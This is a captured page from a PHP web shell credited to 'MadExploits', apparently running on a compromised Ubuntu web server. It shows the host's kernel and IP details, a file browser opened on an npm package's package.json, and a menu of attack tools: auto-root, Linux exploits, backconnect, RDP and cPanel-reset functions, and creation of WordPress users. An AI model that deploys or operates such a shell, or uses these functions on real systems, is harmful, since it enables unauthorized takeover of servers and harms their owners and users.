Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
isstream /
[ HOME SHELL ]
Name
Size
Permission
Action
.jshintrc
1.12
KB
-rw-rw-r--
.npmignore
6
B
-rw-rw-r--
.travis.yml
150
B
-rw-rw-r--
LICENSE.md
1.1
KB
-rw-rw-r--
README.md
2.37
KB
-rw-rw-r--
isstream.js
588
B
-rw-rw-r--
package.json
897
B
-rw-rw-r--
test.js
6.81
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "isstream", "version": "0.1.2", "description": "Determine if an object is a Stream", "main": "isstream.js", "scripts": { "test": "tar --xform 's/^package/readable-stream-1.0/' -zxf readable-stream-1.0.*.tgz && tar --xform 's/^package/readable-stream-1.1/' -zxf readable-stream-1.1.*.tgz && node test.js; rm -rf readable-stream-1.?/" }, "repository": { "type": "git", "url": "https://github.com/rvagg/isstream.git" }, "keywords": [ "stream", "type", "streams", "readable-stream", "hippo" ], "devDependencies": { "tape": "~2.12.3", "core-util-is": "~1.0.0", "isarray": "0.0.1", "string_decoder": "~0.10.x", "inherits": "~2.0.1" }, "author": "Rod Vagg <rod@vagg.org>", "license": "MIT", "bugs": { "url": "https://github.com/rvagg/isstream/issues" }, "homepage": "https://github.com/rvagg/isstream" }
Close